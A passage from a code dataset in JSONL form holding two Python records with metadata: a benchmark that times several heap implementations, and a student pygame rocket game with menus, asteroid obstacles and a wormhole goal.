"line_number": 138, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "torch.utils.tensorboard.SummaryWriter", "line_number": 190, "usage_type": "call"}, {"api_name": "session.EvalModel", "line_number": 194, "usage_type": "call"}, {"api_name": "util.to_gpu", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 201, "usage_type": "call"}]} +{"seq_id": "5589111039", "text": "import IHeap\nfrom BinaryTreeInArrayBasedHeap import BinaryTreeInArrayBasedHeap\nfrom SimpleArrayBasedHeap import SimpleArrayBasedHeap\nfrom BinaryTreeWithNodesBasedHeap import BinaryTreeWithNodesBasedHeap\nfrom DefaultPythonHeap import 
DefaultPythonHeap\n\n\nfrom typing import List\nimport random\nimport time\n\n\nINITIAL_ELEMENTS_NUM: int = 10\nINITIAL_ELEMENTS_VALUES_RANGE: int = 100\nADD_ELEMENTS_REPEAT_NUM: int = 15000\nREMOVE_ELEMENTS_REPEAT_NUM: int = 1500\n\nNUM_TEST_ITERATIONS: int = 20\nNUM_DIGITS_AFTER_DECIMAL_POINT: int = 4\n\n\ndef modifyHeap(heap: IHeap, action: str) -> None:\n if action == \"add\":\n for repeat in range(ADD_ELEMENTS_REPEAT_NUM):\n heap.add(random.randrange(0, 100000))\n elif action == \"remove\":\n for repeat in range(REMOVE_ELEMENTS_REPEAT_NUM):\n heap.getAndRemoveSmallest()\n\n\ndef benchmarkHeapImplementation(heapImplementation: IHeap) -> None:\n runTimes: List = []\n for test in range(NUM_TEST_ITERATIONS):\n start: float = time.clock()\n\n executeQueries(heapImplementation)\n\n end: float = time.clock()\n runTimes.append(end - start)\n\n print(round(sum(runTimes) / NUM_TEST_ITERATIONS, NUM_DIGITS_AFTER_DECIMAL_POINT))\n\n\ndef executeQueries(h: IHeap) -> None:\n with open(\"TestingActions.txt\") as ta:\n for action in ta:\n modifyHeap(h, action.strip())\n\n\ndef main():\n initialElements: List = [random.randrange(INITIAL_ELEMENTS_VALUES_RANGE) for _ in range(INITIAL_ELEMENTS_NUM)]\n benchmarkHeapImplementation(SimpleArrayBasedHeap(initialElements)) # 11.211\n benchmarkHeapImplementation(BinaryTreeInArrayBasedHeap(initialElements)) # 1.2617\n benchmarkHeapImplementation(BinaryTreeWithNodesBasedHeap(initialElements)) # 3.1434 -> 5.914\n benchmarkHeapImplementation(DefaultPythonHeap(initialElements)) # 0.772\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "zseen/data-structures-practice", "sub_path": "HeapVariations/RuntimeTestOfHeaps.py", "file_name": "RuntimeTestOfHeaps.py", "file_ext": "py", "file_size_in_byte": 1870, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.randrange", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 32, "usage_type": "name"}, {"api_name": "time.clock", "line_number": 34, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 38, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 51, "usage_type": "name"}, {"api_name": "random.randrange", "line_number": 51, "usage_type": "call"}, {"api_name": "SimpleArrayBasedHeap.SimpleArrayBasedHeap", "line_number": 52, "usage_type": "call"}, {"api_name": "BinaryTreeInArrayBasedHeap.BinaryTreeInArrayBasedHeap", "line_number": 53, "usage_type": "call"}, {"api_name": "BinaryTreeWithNodesBasedHeap.BinaryTreeWithNodesBasedHeap", "line_number": 54, "usage_type": "call"}, {"api_name": "DefaultPythonHeap.DefaultPythonHeap", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "17267778405", "text": "from rocketclass import Rocket\nfrom Worm import WormHole\nfrom Asteroid import Asteroid1\nimport pygame, sys\nfrom pygame.locals import *\n \npygame.init()\n\nbackground = pygame.image.load(\"Supernova-Hunters-800x533.png\")\nRocketbg = pygame.image.load(\"rocketbg.png\")\nRocketImage = pygame.transform.scale(Rocketbg,(41,62))\nasteroid = pygame.image.load(\"asteroid-icon.png\")\nast= pygame.transform.scale(asteroid, (50,50))\narrows = pygame.image.load(\"arrow-keys-clipart-8-buttons.png\")\naa= pygame.transform.scale(arrows, (150,150))\nstarbg = pygame.image.load(\"stars-in-night-sky.png\")\nwormhole2 = pygame.image.load(\"wormhole.png\")\nwormhole1 = pygame.transform.scale(wormhole2,(70,70))\nsoundbg = pygame.image.load(\"Space-PNG-Clipart.png\")\ninstrbg = 
pygame.image.load(\"space-png-1920.png\")\n \nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (177, 227, 102)\nBRIGHT_GREEN = (205, 237, 157)\nRED = (234, 53, 70)\nBRIGHT_RED = (241,126,137)\nBRIGHT_Blue = (135,212,223)\nBlue = (67,188,205)\n\n\n\nspeed = 1\nSCREENWIDTH = 800\nSCREENHEIGHT = 500\nsize = (SCREENWIDTH, SCREENHEIGHT)\nscreen = pygame.display.set_mode(size)\n\nASTEROID_sprites_lists = pygame.sprite.Group()\n\nObs = Asteroid1(ast, 10, 10)\nObs1 = Asteroid1(ast, 10, 10)\nObs2 = Asteroid1(ast, 10, 10)\nObs3 = Asteroid1(ast, 10, 10)\nObs4 = Asteroid1(ast, 10, 10)\nObs5 = Asteroid1(ast, 10, 10)\nObs6 = Asteroid1(ast, 10, 10)\nObs7 = Asteroid1(ast, 10, 10)\nObs8 = Asteroid1(ast, 10, 10)\nObs9 = Asteroid1(ast, 10, 10)\nObs10 = Asteroid1(ast, 10, 10)\nObs11 = Asteroid1(ast, 10, 10)\nObs12 = Asteroid1(ast, 10, 10)\nObs13 = Asteroid1(ast, 10, 10)\nObs14 = Asteroid1(ast, 10, 10)\nObs15 = Asteroid1(ast, 10, 10)\nObs16 = Asteroid1(ast, 10, 10)\nObs17 = Asteroid1(ast, 10, 10)\nObs18 = Asteroid1(ast, 10, 10)\nObs19 = Asteroid1(ast, 10, 10)\nObs20 = Asteroid1(ast, 10, 10)\nObs21 = Asteroid1(ast, 10, 10)\nObs22 = Asteroid1(ast, 10, 10)\nObs23 = Asteroid1(ast, 10, 10)\nObs24 = Asteroid1(ast, 10, 10)\nObs25 = Asteroid1(ast, 10, 10)\nObs26 = Asteroid1(ast, 10, 10)\nObs27 = Asteroid1(ast, 10, 10)\nObs28 = Asteroid1(ast, 10, 10)\nObs29 = Asteroid1(ast, 10, 10)\nObs30 = Asteroid1(ast, 10, 10)\nObs31 = Asteroid1(ast, 10, 10)\nObs32 = Asteroid1(ast, 10, 10)\nObs33 = Asteroid1(ast, 10, 10)\nObs34 = Asteroid1(ast, 10, 10)\nObs35 = Asteroid1(ast, 10, 10)\nObs36 = Asteroid1(ast, 10, 10)\nObs37 = Asteroid1(ast, 10, 10)\nObs38 = Asteroid1(ast, 10, 10)\nObs39 = Asteroid1(ast, 10, 10)\nObs40 = Asteroid1(ast, 10, 10)\nObs41 = Asteroid1(ast, 10, 10)\nObs42 = Asteroid1(ast, 10, 10)\nObs43 = Asteroid1(ast, 10, 10)\nObs44 = Asteroid1(ast, 10, 10)\nObs45 = Asteroid1(ast, 10, 10)\nObs46 = Asteroid1(ast, 10, 10)\n\nASTEROID_sprites_lists.add(Obs,Obs1,Obs2,Obs3,Obs4,Obs5,Obs6,Obs7,Obs8,Obs9,Obs10,Obs11,Obs12,Obs13,Obs14,Obs15,Obs16,Obs17,Obs18,Obs19,Obs20,Obs21,Obs22,Obs23,Obs24,Obs25,Obs26,Obs27,Obs28,Obs29,Obs30,Obs31,Obs32,Obs33,Obs34,Obs35,Obs36,Obs37,Obs38,Obs39,Obs40,Obs41,Obs42,Obs43,Obs44,Obs45,Obs46)\n\n\n\nROCKET_sprites_lists = pygame.sprite.Group()\nplayer = Rocket(RocketImage,1,1,5,0,5)\nplayer.rect.x = 460\nplayer.rect.y = 400\nROCKET_sprites_lists.add(player)\n\nWorm_sprites_lists = pygame.sprite.Group()\nWorm2 = WormHole(wormhole1,70,70)\nWorm2.rect.x = 315\nWorm2.rect.y = 135\nWorm_sprites_lists.add(Worm2)\n \npygame.mixer.pre_init(frequency=44100, size=-16, channels=2, buffer=4096)\npygame.mixer.music.load(\"12. 
Marvin Gaye & Tammi Terrell - Ain't No Mountain High Enough.mp3\")\npygame.mixer.music.play(-1)\n\neffect = pygame.mixer.Sound('Rocket Thrusters-SoundBible.com-1432176431.wav')\n\nclass Button():\n \"\"\"This is a class for a generic button.\n \n txt = text on the button\n location = (x,y) coordinates of the button's centre\n action = name of function to run when button is pressed\n bg = background colour (default is white)\n fg = text colour (default is black)\n size = (width, height) of button\n font_name = name of font\n font_size = size of font\n \"\"\"\n def __init__(self, txt, location, action, bg=WHITE, fg=BLACK, size=(100, 40), font_name=\"Segoe Print\", font_size=16):\n self.color = bg \n self.bg = bg \n self.fg = fg \n self.size = size\n\n self.font = pygame.font.SysFont(font_name, font_size)\n self.txt = txt\n self.txt_surf = self.font.render(self.txt, 1, self.fg)\n self.txt_rect = self.txt_surf.get_rect(center=[s//2 for s in self.size])\n self.surface = pygame.surface.Surface(size)\n self.rect = self.surface.get_rect(center=location)\n\n self.call_back_ = action\n\n def draw(self):\n self.mouseover()\n\n self.surface.fill(self.bg)\n self.surface.blit(self.txt_surf, self.txt_rect)\n screen.blit(self.surface, self.rect)\n\n def mouseover(self):\n \"\"\"Checks if mouse is over button using rect collision\"\"\"\n self.bg = self.color\n pos = pygame.mouse.get_pos()\n if self.rect.collidepoint(pos):\n self.bg = BRIGHT_RED\n\n def call_back(self):\n \"\"\"Runs a function when clicked\"\"\"\n self.call_back_()\n \ndef my_shell_function():\n \"\"\"A generic function that prints something in the shell\"\"\"\n print('Fire the nukes!')\n\ndef my_next_function():\n \"\"\"A function that advances to the next level\"\"\"\n global level\n level += 1\n\ndef my_play():\n global level\n level += 2\n stop_music()\n \ndef my_INSTRUCTIONS():\n global level\n level += 3\n\ndef my_next_level():\n global level\n if level == 3:\n level += 2\n else:\n level += 1\n \ndef my_previous_function():\n \"\"\"A function that retreats to the previous level\"\"\"\n bg = RED\n global level\n if level == 3:\n level -=2\n elif level == 4:\n level -=3\n \n elif level == 5:\n level -=4\n else:\n level -= 1\n\ndef my_quit_function():\n \"\"\"A function that will quit the game and close the pygame window\"\"\"\n pygame.quit()\n sys.exit()\n\ndef mousebuttondown(level):\n \"\"\"A function that checks which button was pressed\"\"\"\n pos = pygame.mouse.get_pos()\n if level == 1:\n for button in level1_buttons:\n if button.rect.collidepoint(pos):\n button.call_back()\n elif level == 2:\n for button in level2_buttons:\n if button.rect.collidepoint(pos):\n button.call_back()\n elif level == 3:\n for button in level3_buttons:\n if button.rect.collidepoint(pos):\n button.call_back()\n elif level == 4:\n for button in level4_buttons:\n if button.rect.collidepoint(pos):\n button.call_back()\n elif level == 5:\n for button in level5_buttons:\n if button.rect.collidepoint(pos):\n button.call_back()\n \ndef play_music():\n pygame.mixer.music.unpause()\ndef stop_music():\n pygame.mixer.music.pause()\n\nlevel = 1\ncarryOn = True\nclock = pygame.time.Clock()\n\n\nfontTitle = pygame.font.Font('freesansbold.ttf', 50)\ntextSurfaceTitle = fontTitle.render('MQ Enterprise!', True, WHITE) \ntextRectTitle = textSurfaceTitle.get_rect()\ntextRectTitle.center = (400,50) \n\n\n\nbutton_PLAY = Button(\"PLAY\", (SCREENWIDTH/6, SCREENHEIGHT/4-50),my_play, bg=RED)\nbutton_INSTRUCTIONS = Button(\"INSTRUCTIONS\",(SCREENWIDTH/6, 
SCREENHEIGHT*2/4-50),my_INSTRUCTIONS, bg=RED, font_size = 12)\nbutton_SETTINGS = Button(\"SOUND\", (SCREENWIDTH/6, SCREENHEIGHT*3/4-50),my_next_function, bg=RED)\nbutton_QUIT = Button(\"QUIT\", (SCREENWIDTH/6, SCREENHEIGHT*4/4-50), my_quit_function, bg=RED)\nbutton_ON = Button(\"ON\", (SCREENWIDTH/5, SCREENHEIGHT/4), play_music,bg=RED)\nbutton_OFF= Button(\"OFF\", (SCREENWIDTH/5, SCREENHEIGHT*2/4),stop_music, bg=RED)\nbutton_Previous2 = Button(\"Previous\", (SCREENWIDTH/5, SCREENHEIGHT*3/4), my_previous_function,bg=RED)\n\n#arrange button groups depending on level\nlevel1_buttons = [button_PLAY,button_INSTRUCTIONS,button_SETTINGS, button_QUIT]\nlevel2_buttons = [button_ON,button_OFF,button_Previous2]\nlevel4_buttons = [button_Previous2]\n#---------Main Program Loop----------\n\nwhile carryOn:\n # --- Main event loop ---\n for event in pygame.event.get(): # Player did something\n if event.type == pygame.QUIT: # Player clicked close button\n carryOn = False\n elif event.type == pygame.MOUSEBUTTONDOWN: # Player clicked the mouse\n mousebuttondown(level)\n \n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]:\n player.rotLeft()\n if keys[pygame.K_RIGHT]:\n player.rotRight()\n if keys[pygame.K_UP]:\n effect.play()\n player.Thurst(2)\n if keys[pygame.K_DOWN]:\n player.moveBackward(1)\n \n # reset the rocket if it leaves the screen on any side\n if player.rect.x < 0 or player.rect.x > SCREENWIDTH or player.rect.y < 0 or player.rect.y > SCREENHEIGHT:\n player.rect.x = 460\n player.rect.y = 400\n player.speed = 0\n hits = pygame.sprite.spritecollide(player, ASTEROID_sprites_lists, False, pygame.sprite.collide_circle_ratio(0.95))\n Win = pygame.sprite.spritecollide(player, Worm_sprites_lists, False, pygame.sprite.collide_circle_ratio(0.95))\n if hits:\n level = 6\n print(\"you crashed\")\n #carryOn = False\n elif Win:\n print(\"You Won!\")\n\n my_next_level()\n \n player.reset()\n\n player.rect.x = 680\n player.rect.y = 450\n carryOn = True\n \n \n # --- Game logic goes here\n player.update()\n\n # --- Draw code goes here\n screen.fill(WHITE)\n screen.fill(BLACK)\n screen.blit(starbg,(0,0))\n screen.blit(background, (0, 0))\n screen.blit(Rocketbg, (300,50))\n screen.blit(textSurfaceTitle,textRectTitle)\n\n # Draw buttons\n \n if level == 1: #main screen\n for button in level1_buttons:\n button.draw()\n \n elif level == 2: #settings\n screen.fill(WHITE)\n screen.blit(soundbg,(0,0))\n for button in level2_buttons:\n button.draw()\n \n elif level == 3: #game\n screen.blit(starbg,(0,0))\n ROCKET_sprites_lists.draw(screen)\n Obs.rect.x = 500\n Obs.rect.y = 380\n\n Obs1.rect.x =500\n Obs1.rect.y =300\n\n Obs2.rect.x =480\n Obs2.rect.y =260\n\n Obs3.rect.x =400\n Obs3.rect.y =300\n\n Obs4.rect.x =400\n Obs4.rect.y =380\n\n Obs5.rect.x =380\n Obs5.rect.y =270\n\n Obs6.rect.x =360\n Obs6.rect.y =230\n\n Obs7.rect.x =320\n Obs7.rect.y =200\n\n Obs8.rect.x =430\n Obs8.rect.y =200\n\n\n Obs9.rect.x =410\n Obs9.rect.y =170\n\n\n Obs10.rect.x =380\n Obs10.rect.y =140\n\n ASTEROID_sprites_lists.draw(screen)\n Worm_sprites_lists.draw(screen)\n \n elif level == 4: #instructions\n screen.blit(instrbg,(0,0))\n screen.blit(aa,(20,220))\n for button in level4_buttons:\n button.draw()\n font = pygame.font.Font('freesansbold.ttf', 30)\n text1 = font.render('INSTRUCTIONS',1,WHITE)\n screen.blit(text1,(300,20))\n \n font2 = pygame.font.Font('freesansbold.ttf', 20)\n text2 = font2.render('In this game the objective is to reach the wormhole',1,WHITE)\n screen.blit(text2,(20,100))\n \n text3 = font2.render('that is 
surrounded by orbiting meteoroids. The player must follow',1,WHITE)\n screen.blit(text3,(20,130))\n\n text4 = font2.render('the designated path without touching the meteoroids. If the player's rocket',1,WHITE)\n screen.blit(text4,(20,160))\n\n text5 = font2.render('touches the path or the meteoroids, they will have to restart from the beginning',1,WHITE)\n screen.blit(text5,(20,190))\n\n text6 = font2.render('Up arrow key is thrust',1,WHITE)\n screen.blit(text6,(300,250))\n\n text7 = font2.render('Down arrow key moves rocket backwards',1,WHITE)\n screen.blit(text7,(300,275))\n\n text8 = font2.render('Right arrow key rotates rocket to the right',1,WHITE)\n screen.blit(text8,(300,300))\n\n text9 = font2.render('Left arrow key rotates the rocket to the left',1,WHITE)\n screen.blit(text9,(300,325))\n\n\n elif level == 5: #second level\n screen.blit(starbg,(0,0))\n ROCKET_sprites_lists.draw(screen)\n \n Obs.rect.x = 240\n Obs.rect.y = 210\n\n Obs1.rect.x = 50\n Obs1.rect.y = 200\n\n Obs2.rect.x =40\n Obs2.rect.y =245\n\n Obs3.rect.x =75\n Obs3.rect.y =175\n\n Obs4.rect.x = 110\n Obs4.rect.y = 150\n\n Obs5.rect.x =380\n Obs5.rect.y =180\n\n Obs6.rect.x =320\n Obs6.rect.y =200\n\n Obs7.rect.x =280\n Obs7.rect.y =200\n\n Obs8.rect.x =220\n Obs8.rect.y =180\n\n Obs9.rect.x = 725\n Obs9.rect.y = 410\n \n Obs10.rect.x =700\n Obs10.rect.y =375\n\n Obs11.rect.x =670\n Obs11.rect.y =340\n\n Obs12.rect.x = 740\n Obs12.rect.y = 450\n\n Obs13.rect.x = 580\n Obs13.rect.y = 460\n\n Obs14.rect.x = 540\n Obs14.rect.y = 430\n\n Obs15.rect.x = 500\n Obs15.rect.y = 405\n \n Obs16.rect.x = 460\n Obs16.rect.y = 375\n\n Obs17.rect.x = 420\n Obs17.rect.y = 350\n\n Obs18.rect.x = 380\n Obs18.rect.y = 325\n\n Obs19.rect.x = 340\n Obs19.rect.y = 300\n\n Obs20.rect.x = 300\n Obs20.rect.y = 285\n\n Obs21.rect.x = 260\n Obs21.rect.y = 300\n\n Obs22.rect.x = 220\n Obs22.rect.y = 340\n\n Obs23.rect.x = 180\n Obs23.rect.y = 375\n\n Obs24.rect.x = 140\n Obs24.rect.y = 380\n\n Obs25.rect.x = 100\n Obs25.rect.y = 360\n \n Obs26.rect.x = 60\n Obs26.rect.y = 340\n\n Obs27.rect.x = 20\n Obs27.rect.y = 315\n\n Obs28.rect.x = 20\n Obs28.rect.y = 285\n\n Obs29.rect.x = 425\n Obs29.rect.y = 200\n\n Obs30.rect.x = 460\n Obs30.rect.y = 225\n\n Obs31.rect.x = 500\n Obs31.rect.y = 250\n\n Obs32.rect.x = 540\n Obs32.rect.y = 275\n\n Obs33.rect.x = 580\n Obs33.rect.y = 300\n\n Obs34.rect.x = 620\n Obs34.rect.y = 325\n\n Obs35.rect.x = 200\n Obs35.rect.y = 235\n \n Obs36.rect.x = 350\n Obs36.rect.y = 200\n\n Obs37.rect.x = 160\n Obs37.rect.y = 245\n\n Obs38.rect.x = 160\n Obs38.rect.y = 130\n\n\n Obs39.rect.x = 200\n Obs39.rect.y = 115\n\n \n Obs40.rect.x = 230\n Obs40.rect.y = 100\n\n Obs41.rect.x = 270\n Obs41.rect.y = 100\n\n Obs42.rect.x = 310\n Obs42.rect.y = 90\n\n Obs43.rect.x = 350\n Obs43.rect.y = 100\n\n Obs44.rect.x = 385\n Obs44.rect.y = 115\n\n Obs45.rect.x = 380\n Obs45.rect.y = 140\n \n Obs46.rect.x = 430\n Obs46.rect.y = 250\n\n \n ASTEROID_sprites_lists.draw(screen)\n Worm_sprites_lists.draw(screen)\n\n elif level == 6:\n screen.fill(BLACK)\n font = pygame.font.Font('freesansbold.ttf', 50)\n text1 = font.render('GAME OVER',1,WHITE)\n screen.blit(text1,(250,200))\n \n # Update the screen with queued shapes\n pygame.display.flip()\n\n # --- Limit to 60 frames per second\n clock.tick(60)\n\npygame.quit()\n\n", "repo_name": "BrichtaICS3U/final-project-moaiz-qudrat", "sub_path": "game 1.py", "file_name": "game 1.py", "file_ext": "py", "file_size_in_byte": 15292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, 
"dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 13, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 39, "usage_type": "attribute"}, {"api_name": "Asteroid.Asteroid1", "line_number": 41, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 42, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 43, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 44, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 45, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 46, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 47, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 48, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 49, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 50, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 51, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 52, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 53, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 54, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 55, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 56, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", 
"line_number": 57, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 58, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 59, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 60, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 61, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 62, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 63, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 64, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 65, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 66, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 67, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 68, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 69, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 70, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 71, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 72, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 73, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 74, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 75, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 76, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 77, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 78, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 79, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 80, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 81, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 82, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 83, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 84, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 85, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 86, "usage_type": "call"}, {"api_name": "Asteroid.Asteroid1", "line_number": 87, "usage_type": "call"}, {"api_name": "pygame.sprite.Group", "line_number": 93, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 93, "usage_type": "attribute"}, {"api_name": "rocketclass.Rocket", "line_number": 94, "usage_type": "call"}, {"api_name": "pygame.sprite.Group", "line_number": 99, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 99, "usage_type": "attribute"}, {"api_name": "Worm.WormHole", "line_number": 100, "usage_type": "call"}, {"api_name": "pygame.mixer.pre_init", "line_number": 105, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 106, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 107, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 107, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 109, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 109, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 129, "usage_type": "call"}, {"api_name": "pygame.font", 
"line_number": 129, "usage_type": "attribute"}, {"api_name": "pygame.surface.Surface", "line_number": 133, "usage_type": "call"}, {"api_name": "pygame.surface", "line_number": 133, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 148, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 148, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 197, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 198, "usage_type": "call"}, {"api_name": "pygame.mouse.get_pos", "line_number": 202, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 202, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.unpause", "line_number": 225, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 225, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.pause", "line_number": 227, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 227, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 231, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 231, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 234, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 234, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 257, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 257, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 258, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 260, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 263, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 263, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 264, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 266, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 268, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 271, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 278, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 278, "usage_type": "attribute"}, {"api_name": "pygame.sprite.collide_circle_ratio", "line_number": 278, "usage_type": "call"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 279, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 279, "usage_type": "attribute"}, {"api_name": "pygame.sprite.collide_circle_ratio", "line_number": 279, "usage_type": "call"}, {"api_name": "pygame.font.Font", "line_number": 368, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 368, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 372, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 372, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 551, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 551, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 556, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 556, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 561, "usage_type": "call"}]} +{"seq_id": "33516537711", "text": "#! 
